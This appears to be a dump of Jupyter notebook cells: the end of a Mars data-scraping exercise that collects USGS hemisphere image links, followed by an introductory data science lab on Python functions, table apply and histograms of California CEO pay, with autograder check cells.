"facts_html = browser.html\nsoup = bs(facts_html, \"html.parser\")",
"_____no_output_____"
],
[
"mars_dict = {}",
"_____no_output_____"
],
[
"results = soup.find('tbody').find_all('tr')",
"_____no_output_____"
],
[
"for result in results:\n column_description = result.find('td', class_=\"column-1\").text\n column_fact = result.find('td', class_=\"column-2\").text\n mars_dict[column_description] = column_fact",
"_____no_output_____"
],
[
"df = pd.DataFrame(list(mars_dict.items()), columns=['Facts', 'Data'])",
"_____no_output_____"
],
[
"df",
"_____no_output_____"
]
],
[
[
"Mars Hemispheres Visit the USGS Astrogeology site here to obtain high resolution images for each of Mar's hemispheres.",
"_____no_output_____"
]
],
[
[
"executable_path = {\"executable_path\":\"C:/Users/cgrinstead12/Desktop/Mission to Mars/chromedriver.exe\"}\nbrowser = Browser(\"chrome\", **executable_path, headless = False)\nurl = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars'",
"_____no_output_____"
],
[
"hemispheres = ['Cerberus Hemisphere Enhanced', \n 'Schiaparelli Hemisphere Enhanced', \n 'Syrtis Major Hemisphere Enhanced', \n 'Valles Marineris Hemisphere Enhanced']\nlinks = []\nfor hemisphere in hemispheres:\n browser.visit(url)\n browser.click_link_by_partial_text(hemisphere)\n highresMars_html = browser.html\n soup = bs(highresMars_html, \"html.parser\")\n image_url_hemisphere = soup.find('div', class_='downloads').a['href']\n links.append(image_url_hemisphere)\n \nhemisphere_links = dict(zip(hemispheres, links))",
"_____no_output_____"
],
[
"print(hemisphere_links)",
"{'Cerberus Hemisphere Enhanced': 'http://astropedia.astrogeology.usgs.gov/download/Mars/Viking/cerberus_enhanced.tif/full.jpg', 'Schiaparelli Hemisphere Enhanced': 'http://astropedia.astrogeology.usgs.gov/download/Mars/Viking/schiaparelli_enhanced.tif/full.jpg', 'Syrtis Major Hemisphere Enhanced': 'http://astropedia.astrogeology.usgs.gov/download/Mars/Viking/syrtis_major_enhanced.tif/full.jpg', 'Valles Marineris Hemisphere Enhanced': 'http://astropedia.astrogeology.usgs.gov/download/Mars/Viking/valles_marineris_enhanced.tif/full.jpg'}\n"
]
],
[
[
"STEP 2 Use MongoDB with Flask templating to create a new HTML page that displays all of the information that was scraped from the URLs above.",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
]
] |
cb012ab2b2b6df1fee50d47117781c4453b1c350 | 42,822 | ipynb | Jupyter Notebook | lab/lab04/.ipynb_checkpoints/lab04-checkpoint.ipynb | ds-modules/Colab-demo | cccaff13633f8a5ec697cd4aeca9087f2feec2e4 | [
"BSD-3-Clause"
] | null | null | null | lab/lab04/.ipynb_checkpoints/lab04-checkpoint.ipynb | ds-modules/Colab-demo | cccaff13633f8a5ec697cd4aeca9087f2feec2e4 | [
"BSD-3-Clause"
] | null | null | null | lab/lab04/.ipynb_checkpoints/lab04-checkpoint.ipynb | ds-modules/Colab-demo | cccaff13633f8a5ec697cd4aeca9087f2feec2e4 | [
"BSD-3-Clause"
] | null | null | null | 31.956716 | 492 | 0.604759 | [
[
[
"# Initialize Otter\nimport otter\ngrader = otter.Notebook(\"lab04.ipynb\")",
"_____no_output_____"
]
],
[
[
"# Lab 4: Functions and Visualizations",
"_____no_output_____"
],
[
"Welcome to Lab 4! This week, we'll learn about functions, table methods such as `apply`, and how to generate visualizations! \n\nRecommended Reading:\n\n* [Applying a Function to a Column](https://www.inferentialthinking.com/chapters/08/1/applying-a-function-to-a-column.html)\n* [Visualizations](https://www.inferentialthinking.com/chapters/07/visualization.html)\n\nFirst, set up the notebook by running the cell below.",
"_____no_output_____"
]
],
[
[
"import numpy as np\nfrom datascience import *\n\n# These lines set up graphing capabilities.\nimport matplotlib\n%matplotlib inline\nimport matplotlib.pyplot as plt\nplt.style.use('fivethirtyeight')\nimport warnings\nwarnings.simplefilter('ignore', FutureWarning)\n\nfrom ipywidgets import interact, interactive, fixed, interact_manual\nimport ipywidgets as widgets\n",
"_____no_output_____"
]
],
[
[
"**Deadline**: If you are not attending lab physically, you have to complete this lab and submit by Wednesday, February 12th before 8:59 A.M. in order to receive lab credit. Otherwise, please attend the lab you are enrolled in, get checked off with your (u)GSI or learning assistant **AND** submit this assignment by the end of the lab section (with whatever progress you've made) to receive lab credit.\n\n**Submission**: Once you're finished, select \"Save and Checkpoint\" in the File menu and then execute the submit cell at the end. The result will contain a link that you can use to check that your assignment has been submitted successfully. ",
"_____no_output_____"
],
[
"## 1. Defining functions\n\nLet's write a very simple function that converts a proportion to a percentage by multiplying it by 100. For example, the value of `to_percentage(.5)` should be the number 50 (no percent sign).\n\nA function definition has a few parts.\n\n##### `def`\nIt always starts with `def` (short for **def**ine):\n\n def\n\n##### Name\nNext comes the name of the function. Like other names we've defined, it can't start with a number or contain spaces. Let's call our function `to_percentage`:\n \n def to_percentage\n\n##### Signature\nNext comes something called the *signature* of the function. This tells Python how many arguments your function should have, and what names you'll use to refer to those arguments in the function's code. A function can have any number of arguments (including 0!). \n\n`to_percentage` should take one argument, and we'll call that argument `proportion` since it should be a proportion.\n\n def to_percentage(proportion)\n \nIf we want our function to take more than one argument, we add a comma between each argument name. Note that if we had zero arguments, we'd still place the parentheses () after than name. \n\nWe put a colon after the signature to tell Python it's over. If you're getting a syntax error after defining a function, check to make sure you remembered the colon!\n\n def to_percentage(proportion):\n\n##### Documentation\nFunctions can do complicated things, so you should write an explanation of what your function does. For small functions, this is less important, but it's a good habit to learn from the start. Conventionally, Python functions are documented by writing an **indented** triple-quoted string:\n\n def to_percentage(proportion):\n \"\"\"Converts a proportion to a percentage.\"\"\"\n \n \n##### Body\nNow we start writing code that runs when the function is called. This is called the *body* of the function and every line **must be indented with a tab**. Any lines that are *not* indented and left-aligned with the def statement is considered outside the function. \n\nSome notes about the body of the function:\n- We can write code that we would write anywhere else. \n- We use the arguments defined in the function signature. We can do this because we assume that when we call the function, values are already assigned to those arguments.\n- We generally avoid referencing variables defined *outside* the function. If you would like to reference variables outside of the function, pass them through as arguments!\n\n\nNow, let's give a name to the number we multiply a proportion by to get a percentage:\n\n def to_percentage(proportion):\n \"\"\"Converts a proportion to a percentage.\"\"\"\n factor = 100\n\n##### `return`\nThe special instruction `return` is part of the function's body and tells Python to make the value of the function call equal to whatever comes right after `return`. We want the value of `to_percentage(.5)` to be the proportion .5 times the factor 100, so we write:\n\n def to_percentage(proportion):\n \"\"\"Converts a proportion to a percentage.\"\"\"\n factor = 100\n return proportion * factor\n \n`return` only makes sense in the context of a function, and **can never be used outside of a function**. `return` is always the last line of the function because Python stops executing the body of a function once it hits a `return` statement.\n\n*Note:* `return` inside a function tells Python what value the function evaluates to. However, there are other functions, like `print`, that have no `return` value. 
For example, `print` simply prints a certain value out to the console. \n\n`return` and `print` are **very** different. ",
"_____no_output_____"
],
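[
"Putting those pieces together, the complete definition built up above is, as a quick recap:\n\n    def to_percentage(proportion):\n        \"\"\"Converts a proportion to a percentage.\"\"\"\n        factor = 100\n        return proportion * factor\n\n    to_percentage(.5)   # evaluates to 50.0",
"_____no_output_____"
],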
[
"**Question 1.1.** Define `to_percentage` in the cell below. Call your function to convert the proportion .2 to a percentage. Name that percentage `twenty_percent`.\n\n<!--\nBEGIN QUESTION\nname: q11\n-->",
"_____no_output_____"
]
],
[
[
"...\n \"\"\"\" Converts a proportion to a percentage\"\"\"\n factor = ...\n ...\n\ntwenty_percent = ...\ntwenty_percent",
"_____no_output_____"
],
[
"grader.check(\"q11\")",
"_____no_output_____"
]
],
[
[
"Like you’ve done with built-in functions in previous labs (max, abs, etc.), you can pass in named values as arguments to your function.\n\n**Question 1.2.** Use `to_percentage` again to convert the proportion named `a_proportion` (defined below) to a percentage called `a_percentage`.\n\n*Note:* You don't need to define `to_percentage` again! Like other named values, functions stick around after you define them.\n\n<!--\nBEGIN QUESTION\nname: q12\n-->",
"_____no_output_____"
]
],
[
[
"a_proportion = 2**(.5) / 2\na_percentage = ...\na_percentage",
"_____no_output_____"
],
[
"grader.check(\"q12\")",
"_____no_output_____"
]
],
[
[
"Here's something important about functions: the names assigned *within* a function body are only accessible within the function body. Once the function has returned, those names are gone. So even if you created a variable called `factor` and defined `factor = 100` inside of the body of the `to_percentage` function and then called `to_percentage`, `factor` would not have a value assigned to it outside of the body of `to_percentage`:",
"_____no_output_____"
]
],
[
[
"# You should see an error when you run this. (If you don't, you might\n# have defined factor somewhere above.)\nfactor",
"_____no_output_____"
]
],
[
[
"As we've seen with built-in functions, functions can also take strings (or arrays, or tables) as arguments, and they can return those things, too.\n\n**Question 1.3.** Define a function called `disemvowel`. It should take a single string as its argument. (You can call that argument whatever you want.) It should return a copy of that string, but with all the characters that are vowels removed. (In English, the vowels are the characters \"a\", \"e\", \"i\", \"o\", and \"u\".) You can use as many lines inside of the function to do this as you’d like.\n\n*Hint:* To remove all the \"a\"s from a string, you can use `that_string.replace(\"a\", \"\")`. The `.replace` method for strings returns a new string, so you can call `replace` multiple times, one after the other. \n\n<!--\nBEGIN QUESTION\nname: q13\n-->",
"_____no_output_____"
]
],
[
[
"def disemvowel(a_string):\n \"\"\"Removes all vowels from a string.\"\"\" \n ...\n\n# An example call to your function. (It's often helpful to run\n# an example call from time to time while you're writing a function,\n# to see how it currently works.)\ndisemvowel(\"Can you read this without vowels?\")",
"_____no_output_____"
],
[
"grader.check(\"q13\")",
"_____no_output_____"
]
],
[
[
"##### Calls on calls on calls\nJust as you write a series of lines to build up a complex computation, it's useful to define a series of small functions that build on each other. Since you can write any code inside a function's body, you can call other functions you've written.\n\nIf a function is a like a recipe, defining a function in terms of other functions is like having a recipe for cake telling you to follow another recipe to make the frosting, and another to make the jam filling. This makes the cake recipe shorter and clearer, and it avoids having a bunch of duplicated frosting recipes. It's a foundation of productive programming.\n\nFor example, suppose you want to count the number of characters *that aren't vowels* in a piece of text. One way to do that is this to remove all the vowels and count the size of the remaining string.\n\n**Question 1.4.** Write a function called `num_non_vowels`. It should take a string as its argument and return a number. That number should be the number of characters in the argument string that aren't vowels. You should use the `disemvowel` function you wrote above inside of the `num_non_vowels` function.\n\n*Hint:* The function `len` takes a string as its argument and returns the number of characters in it.\n\n<!--\nBEGIN QUESTION\nname: q14\n-->",
"_____no_output_____"
]
],
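[
[
"As a small, generic illustration of one function calling another (the names `square` and `sum_of_squares` here are just examples, separate from the question above):\n\n    def square(x):\n        return x * x\n\n    def sum_of_squares(a, b):\n        # sum_of_squares is defined in terms of square\n        return square(a) + square(b)\n\n    sum_of_squares(3, 4)   # evaluates to 25",
"_____no_output_____"
]
],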
[
[
"def num_non_vowels(a_string):\n \"\"\"The number of characters in a string, minus the vowels.\"\"\"\n ...\n\n# Try calling your function yourself to make sure the output is what\n# you expect. You can also use the interact function in the next cell if you'd like.",
"_____no_output_____"
],
[
"grader.check(\"q14\")",
"_____no_output_____"
]
],
[
[
"Functions can also encapsulate code that *displays output* instead of computing a value. For example, if you call `print` inside a function, and then call that function, something will get printed.\n\nThe `movies_by_year` dataset in the textbook has information about movie sales in recent years. Suppose you'd like to display the year with the 5th-highest total gross movie sales, printed in a human-readable way. You might do this:",
"_____no_output_____"
]
],
[
[
"movies_by_year = Table.read_table(\"movies_by_year.csv\")\nrank = 5\nfifth_from_top_movie_year = movies_by_year.sort(\"Total Gross\", descending=True).column(\"Year\").item(rank-1)\nprint(\"Year number\", rank, \"for total gross movie sales was:\", fifth_from_top_movie_year)",
"_____no_output_____"
]
],
[
[
"After writing this, you realize you also wanted to print out the 2nd and 3rd-highest years. Instead of copying your code, you decide to put it in a function. Since the rank varies, you make that an argument to your function.\n\n**Question 1.5.** Write a function called `print_kth_top_movie_year`. It should take a single argument, the rank of the year (like 2, 3, or 5 in the above examples). It should print out a message like the one above. \n\n*Note:* Your function shouldn't have a `return` statement.\n\n<!--\nBEGIN QUESTION\nname: q15\n-->",
"_____no_output_____"
]
],
[
[
"...\nprint(...)\n\n...\n\n# Example calls to your function:\nprint_kth_top_movie_year(2)\nprint_kth_top_movie_year(3)",
"_____no_output_____"
],
[
"grader.check(\"q15\")",
"_____no_output_____"
],
[
"# interact also allows you to pass in an array for a function argument. It will\n# then present a dropdown menu of options.\n_ = interact(print_kth_top_movie_year, k=np.arange(1, 10))",
"_____no_output_____"
]
],
[
[
"### `print` is not the same as `return`\nThe `print_kth_top_movie_year(k)` function prints the total gross movie sales for the year that was provided! However, since we did not return any value in this function, we can not use it after we call it. Let's look at an example of another function that prints a value but does not return it.",
"_____no_output_____"
]
],
[
[
"def print_number_five():\n print(5)",
"_____no_output_____"
],
[
"print_number_five()",
"_____no_output_____"
]
],
[
[
"However, if we try to use the output of `print_number_five()`, we see that the value `5` is printed but we get a TypeError when we try to add the number 2 to it!",
"_____no_output_____"
]
],
[
[
"print_number_five_output = print_number_five()\nprint_number_five_output + 2",
"_____no_output_____"
]
],
[
[
"It may seem that `print_number_five()` is returning a value, 5. In reality, it just displays the number 5 to you without giving you the actual value! If your function prints out a value without returning it and you try to use that value, you will run into errors, so be careful!\n\nExplain to your neighbor how you might add a line of code to the `print_number_five` function (after `print(5)`) so that the code `print_number_five_output + 5` would result in the value `10`, rather than an error.",
"_____no_output_____"
],
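[
"One way to make that work, sketched here for illustration, is to have the function return the value in addition to printing it:\n\n    def print_number_five():\n        print(5)      # displays 5 in the console\n        return 5      # also hands the value 5 back to the caller\n\n    print_number_five_output = print_number_five()\n    print_number_five_output + 5   # now evaluates to 10",
"_____no_output_____"
],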
[
"## 2. Functions and CEO Incomes\n\nIn this question, we'll look at the 2015 compensation of CEOs at the 100 largest companies in California. The data was compiled from a [Los Angeles Times analysis](http://spreadsheets.latimes.com/california-ceo-compensation/), and ultimately came from [filings](https://www.sec.gov/answers/proxyhtf.htm) mandated by the SEC from all publicly-traded companies. Two companies have two CEOs, so there are 102 CEOs in the dataset.\n\nWe've copied the raw data from the LA Times page into a file called `raw_compensation.csv`. (The page notes that all dollar amounts are in **millions of dollars**.)",
"_____no_output_____"
]
],
[
[
"raw_compensation = Table.read_table('raw_compensation.csv')\nraw_compensation",
"_____no_output_____"
]
],
[
[
"We want to compute the average of the CEOs' pay. Try running the cell below.",
"_____no_output_____"
]
],
[
[
"np.average(raw_compensation.column(\"Total Pay\"))",
"_____no_output_____"
]
],
[
[
"You should see a TypeError. Let's examine why this error occurred by looking at the values in the `Total Pay` column. \n\n**Question 2.1.** Use the `type` function and set `total_pay_type` to the type of the first value in the \"Total Pay\" column.\n\n<!--\nBEGIN QUESTION\nname: q21\n-->",
"_____no_output_____"
]
],
[
[
"total_pay_type = ...\ntotal_pay_type",
"_____no_output_____"
],
[
"grader.check(\"q21\")",
"_____no_output_____"
]
],
[
[
"**Question 2.2.** You should have found that the values in the `Total Pay` column are strings. It doesn't make sense to take the average of string values, so we need to convert them to numbers if we want to do this. Extract the first value in `Total Pay`. It's Mark Hurd's pay in 2015, in *millions* of dollars. Call it `mark_hurd_pay_string`.\n\n<!--\nBEGIN QUESTION\nname: q22\n-->",
"_____no_output_____"
]
],
[
[
"mark_hurd_pay_string = ...\nmark_hurd_pay_string",
"_____no_output_____"
],
[
"grader.check(\"q22\")",
"_____no_output_____"
]
],
[
[
"**Question 2.3.** Convert `mark_hurd_pay_string` to a number of *dollars*. \n\nSome hints, as this question requires multiple steps:\n- The string method `strip` will be useful for removing the dollar sign; it removes a specified character from the start or end of a string. For example, the value of `\"100%\".strip(\"%\")` is the string `\"100\"`. \n- You'll also need the function `float`, which converts a string that looks like a number to an actual number. \n- Finally, remember that the answer should be in dollars, not millions of dollars.\n\n<!--\nBEGIN QUESTION\nname: q23\n-->",
"_____no_output_____"
]
],
[
[
"mark_hurd_pay = ...\nmark_hurd_pay",
"_____no_output_____"
],
[
"grader.check(\"q23\")",
"_____no_output_____"
]
],
[
[
"To compute the average pay, we need to do this for every CEO. But that looks like it would involve copying this code 102 times.\n\nThis is where functions come in. First, we'll define a new function, giving a name to the expression that converts \"total pay\" strings to numeric values. Later in this lab, we'll see the payoff: we can call that function on every pay string in the dataset at once.\n\nThe next section of this lab explains how to define a function For now, just fill in the ellipses in the cell below.\n\n**Question 2.4.** Copy the expression you used to compute `mark_hurd_pay`, and use it as the return expression of the function below. But make sure you replace the specific `mark_hurd_pay_string` with the generic `pay_string` name specified in the first line in the `def` statement.\n\n*Hint*: When dealing with functions, you should generally not be referencing any variable outside of the function. Usually, you want to be working with the arguments that are passed into it, such as `pay_string` for this function. If you're using `mark_hurd_pay_string` within your function, you're referencing an outside variable!\n\n<!--\nBEGIN QUESTION\nname: q24\n-->",
"_____no_output_____"
]
],
[
[
"def convert_pay_string_to_number(pay_string):\n \"\"\"Converts a pay string like '$100' (in millions) to a number of\n dollars.\"\"\"\n ...",
"_____no_output_____"
],
[
"grader.check(\"q24\")",
"_____no_output_____"
]
],
[
[
"Running that cell doesn't convert any particular pay string. Instead, it creates a function called `convert_pay_string_to_number` that can convert *any* string with the right format to a number representing millions of dollars.\n\nWe can call our function just like we call the built-in functions we've seen. It takes one argument -- a string -- and it returns a float.",
"_____no_output_____"
]
],
[
[
"convert_pay_string_to_number('$42')",
"_____no_output_____"
],
[
"convert_pay_string_to_number(mark_hurd_pay_string)",
"_____no_output_____"
],
[
"# We can also compute Safra Catz's pay in the same way:\nconvert_pay_string_to_number(raw_compensation.where(\"Name\", are.containing(\"Safra\")).column(\"Total Pay\").item(0))",
"_____no_output_____"
]
],
[
[
"So, what have we gained by defining the `convert_pay_string_to_number` function? \nWell, without it, we'd have to copy the code `10**6 * float(some_pay_string.strip(\"$\"))` each time we wanted to convert a pay string. Now we just call a function whose name says exactly what it's doing.",
"_____no_output_____"
],
[
"## 3. `apply`ing functions\n\nDefining a function is a lot like giving a name to a value with `=`. In fact, a function is a value just like the number 1 or the text \"data\"!\n\nFor example, we can make a new name for the built-in function `max` if we want:",
"_____no_output_____"
]
],
[
[
"our_name_for_max = max\nour_name_for_max(2, 6)",
"_____no_output_____"
]
],
[
[
"The old name for `max` is still around:",
"_____no_output_____"
]
],
[
[
"max(2, 6)",
"_____no_output_____"
]
],
[
[
"Try just writing `max` or `our_name_for_max` (or the name of any other function) in a cell, and run that cell. Python will print out a (very brief) description of the function.",
"_____no_output_____"
]
],
[
[
"max",
"_____no_output_____"
]
],
[
[
"Now try writing `?max` or `?our_name_for_max` (or the name of any other function) in a cell, and run that cell. A information box should show up at the bottom of your screen a longer description of the function\n\n*Note: You can also press Shift+Tab after clicking on a name to see similar information!*",
"_____no_output_____"
]
],
[
[
"?our_name_for_max",
"_____no_output_____"
]
],
[
[
"Let's look at what happens when we set `max`to a non-function value. You'll notice that a TypeError will occur when you try calling `max`. Things like integers and strings are not callable. Look out for any functions that might have been renamed when you encounter this type of error",
"_____no_output_____"
]
],
[
[
"max = 6\nmax(2, 6)",
"_____no_output_____"
],
[
"# This cell resets max to the built-in function. Just run this cell, don't change its contents\nimport builtins\nmax = builtins.max",
"_____no_output_____"
]
],
[
[
"Why is this useful? Since functions are just values, it's possible to pass them as arguments to other functions. Here's a simple but not-so-practical example: we can make an array of functions.",
"_____no_output_____"
]
],
[
[
"make_array(max, np.average, are.equal_to)",
"_____no_output_____"
]
],
[
[
"**Question 3.1.** Make an array containing any 3 other functions you've seen. Call it `some_functions`.\n\n<!--\nBEGIN QUESTION\nname: q31\n-->",
"_____no_output_____"
]
],
[
[
"some_functions = ...\nsome_functions",
"_____no_output_____"
],
[
"grader.check(\"q31\")",
"_____no_output_____"
]
],
[
[
"Working with functions as values can lead to some funny-looking code. For example, see if you can figure out why the following code works. Check your explanation with a neighbor or a staff member.",
"_____no_output_____"
]
],
[
[
"make_array(max, np.average, are.equal_to).item(0)(4, -2, 7)",
"_____no_output_____"
]
],
[
[
"A more useful example of passing functions to other functions as arguments is the table method `apply`.\n\n`apply` calls a function many times, once on *each* element in a column of a table. It produces an *array* of the results. Here we use `apply` to convert every CEO's pay to a number, using the function you defined:",
"_____no_output_____"
]
],
[
[
"raw_compensation.apply(convert_pay_string_to_number, \"Total Pay\")",
"_____no_output_____"
]
],
[
[
"Here's an illustration of what that did:\n\n<img src=\"apply.png\"/>\n\nNote that we didn’t write `raw_compensation.apply(convert_pay_string_to_number(), “Total Pay”)` or `raw_compensation.apply(convert_pay_string_to_number(“Total Pay”))`. We just passed the name of the function, with no parentheses, to `apply`, because all we want to do is let `apply` know the name of the function we’d like to use and the name of the column we’d like to use it on. `apply` will then call the function `convert_pay_string_to_number` on each value in the column for us!\n\n**Question 3.2.** Using `apply`, make a table that's a copy of `raw_compensation` with one additional column called `Total Pay ($)`. That column should contain the result of applying `convert_pay_string_to_number` to the `Total Pay` column (as we did above). Call the new table `compensation`.\n\n<!--\nBEGIN QUESTION\nname: q32\n-->",
"_____no_output_____"
]
],
[
[
"compensation = raw_compensation.with_column(\n \"Total Pay ($)\",\n ...\n ) \ncompensation",
"_____no_output_____"
],
[
"grader.check(\"q32\")",
"_____no_output_____"
]
],
[
[
"Now that we have all the pays as numbers, we can learn more about them through computation.\n\n**Question 3.3.** Compute the average total pay of the CEOs in the dataset.\n\n<!--\nBEGIN QUESTION\nname: q33\n-->",
"_____no_output_____"
]
],
[
[
"average_total_pay = ...\naverage_total_pay",
"_____no_output_____"
],
[
"grader.check(\"q33\")",
"_____no_output_____"
]
],
[
[
"**Question 3.4.** Companies pay executives in a variety of ways: in cash, by granting stock or other equity in the company, or with ancillary benefits (like private jets). Compute the proportion of each CEO's pay that was cash. (Your answer should be an array of numbers, one for each CEO in the dataset.)\n\n*Note:* When you answer this question, you'll encounter a red box appearing below your code cell that says something like `RuntimeWarning: invalid value encountered in true_divide`. Don't worry too much about the message. Warnings are raised by Python when it encounters an unusual condition in your code, but the condition is not severe enough to warrant throwing an error. \n\nThe warning below is Python's cryptic way of telling you that you're dividing a number by zero. If you extract the values in `Total Pay ($)` as an array, you'll see that the last element is 0.\n\n<!--\nBEGIN QUESTION\nname: q34\n-->",
"_____no_output_____"
]
],
[
[
"cash_proportion = ...\ncash_proportion",
"_____no_output_____"
],
[
"grader.check(\"q34\")",
"_____no_output_____"
]
],
[
[
"Check out the `% Change` column in `compensation`. It shows the percentage increase in the CEO's pay from the previous year. For CEOs with no previous year on record, it instead says \"(No previous year)\". The values in this column are *strings*, not numbers, so like the `Total Pay` column, it's not usable without a bit of extra work.\n\nGiven your current pay and the percentage increase from the previous year, you can compute your previous year's pay. For example, if your pay is $\\$120$ this year, and that's an increase of 50% from the previous year, then your previous year's pay was $\\frac{\\$120}{1 + \\frac{50}{100}}$, or \\$80.\n\n**Question 3.5.** Create a new table called `with_previous_compensation`. It should be a copy of `compensation`, but with the \"(No previous year)\" CEOs filtered out, and with an extra column called `2014 Total Pay ($)`. That column should have each CEO's pay in 2014.\n\n*Hint 1:* You can print out your results after each step to make sure you're on the right track.\n\n*Hint 2:* We've provided a structure that you can use to get to the answer. However, if it's confusing, feel free to delete the current structure and approach the problem your own way!\n\n<!--\nBEGIN QUESTION\nname: q35\n-->",
"_____no_output_____"
]
],
[
[
"# Definition to turn percent to number\ndef percent_string_to_num(percent_string):\n \"\"\"Converts a percentage string to a number.\"\"\"\n return ...\n\n# Compensation table where there is a previous year\nhaving_previous_year = ...\n\n# Get the percent changes as numbers instead of strings\n# We're still working off the table having_previous_year\npercent_changes = ...\n\n# Calculate the previous year's pay\n# We're still working off the table having_previous_year\nprevious_pay = ...\n\n# Put the previous pay column into the having_previous_year table\nwith_previous_compensation = ...\n\nwith_previous_compensation",
"_____no_output_____"
],
[
"grader.check(\"q35\")",
"_____no_output_____"
]
],
[
[
"**Question 3.6.** What was the average pay of these CEOs in 2014?\n\n<!--\nBEGIN QUESTION\nname: q36\n-->",
"_____no_output_____"
]
],
[
[
"average_pay_2014 = np.average(with_previous_compensation.column(\"2014 Total Pay ($)\"))\naverage_pay_2014",
"_____no_output_____"
],
[
"grader.check(\"q36\")",
"_____no_output_____"
]
],
[
[
"**Why is `apply` useful?**\n\nFor operations like arithmetic, or the functions in the NumPy library, you don't need to use `apply`, because they automatically work on each element of an array. But there are many things that don't. The string manipulation we did in today's lab is one example. Since you can write any code you want in a function, `apply` gives you total control over how you operate on data.",
"_____no_output_____"
],
[
"## 4. Histograms\nEarlier, we computed the average pay among the CEOs in our 102-CEO dataset. The average doesn't tell us everything about the amounts CEOs are paid, though. Maybe just a few CEOs make the bulk of the money, even among these 102.\n\nWe can use a *histogram* method to display the *distribution* of a set of numbers. The table method `hist` takes a single argument, the name of a column of numbers. It produces a histogram of the numbers in that column.\n\n**Question 4.1.** Make a histogram of the total pay of the CEOs in `compensation`. Check with your neighbor or a staff member to make sure you have the right plot.\n\n<!--\nBEGIN QUESTION\nname: q41\n-->",
"_____no_output_____"
]
],
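A hedged illustration of the two ideas above — `apply` with a custom function and `hist` for a distribution — on a tiny made-up table, assuming the `datascience` package is the source of the `Table` methods used throughout this lab:

```python
from datascience import Table  # assumed: the library providing where/column/hist in this lab

# Tiny made-up table of pay strings shaped like the lab's data
toy = Table().with_columns(
    'Name', ['A', 'B', 'C', 'D', 'E', 'F'],
    'Total Pay', ['$12.3', '$0.8', '$25.0', '$3.1', '$7.7', '$1.2'],
)

def pay_string_to_number(pay_string):
    """Strip the leading '$' and convert to a float (millions of dollars)."""
    return float(pay_string.strip('$'))

# apply runs the custom function on every entry of the named column
pay_numbers = toy.apply(pay_string_to_number, 'Total Pay')

# hist draws the distribution of a numeric column
toy.with_column('Total Pay ($)', pay_numbers).hist('Total Pay ($)')
```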
[
[
"...",
"_____no_output_____"
]
],
[
[
"**Question 4.2.** How many CEOs made more than $30 million in total pay? Find the value using code, then check that the value you found is consistent with what you see in the histogram.\n\n*Hint:* Use the table method `where` and the property `num_rows`.\n\n<!--\nBEGIN QUESTION\nname: q42\n-->",
"_____no_output_____"
]
],
[
[
"num_ceos_more_than_30_million_2 = compensation.where(\"Total Pay ($)\", are.above(30000000)).num_rows\nnum_ceos_more_than_30_million_2",
"_____no_output_____"
],
[
"grader.check(\"q42\")",
"_____no_output_____"
]
],
[
[
"## 5. Project 1 Partner Form\n\nProject 1 will be released this Friday! You have the option of working with a partner that is enrolled in your lab. Your GSI will be sending out a form to match you up with a partner for this project. You may also indicate if you're working alone or have already found a partner and do not need to be paired up. This form is **mandatory** - please fill it out before submitting your lab. Set `submitted` to `True` once you've submitted the form.\n\nNote: If you are completing this lab before the early submission deadline, the form may not have been sent out yet. Set `submitted` to `True` for now, and keep an eye out for an email from your GSI later this week.\n\n<!--\nBEGIN QUESTION\nname: q5\n-->",
"_____no_output_____"
]
],
[
[
"submitted = ...",
"_____no_output_____"
],
[
"grader.check(\"q5\")",
"_____no_output_____"
]
],
[
[
"Great job! You're finished with lab 4! Be sure to...\n\n* **run all the tests** (the next cell has a shortcut for that),\n* **Save and Checkpoint** from the File menu,\n* **run the last cell to submit your work**,\n* and **ask one of the staff members to check you off**.",
"_____no_output_____"
],
[
"---\n\nTo double-check your work, the cell below will rerun all of the autograder tests.",
"_____no_output_____"
]
],
[
[
"grader.check_all()",
"_____no_output_____"
]
],
[
[
"## Submission\n\nMake sure you have run all cells in your notebook in order before running the cell below, so that all images/graphs appear in the output. The cell below will generate a zip file for you to submit. **Please save before exporting!**",
"_____no_output_____"
]
],
[
[
"# Save your notebook first, then run this cell to export your submission.\ngrader.export()",
"_____no_output_____"
]
],
[
[
" ",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
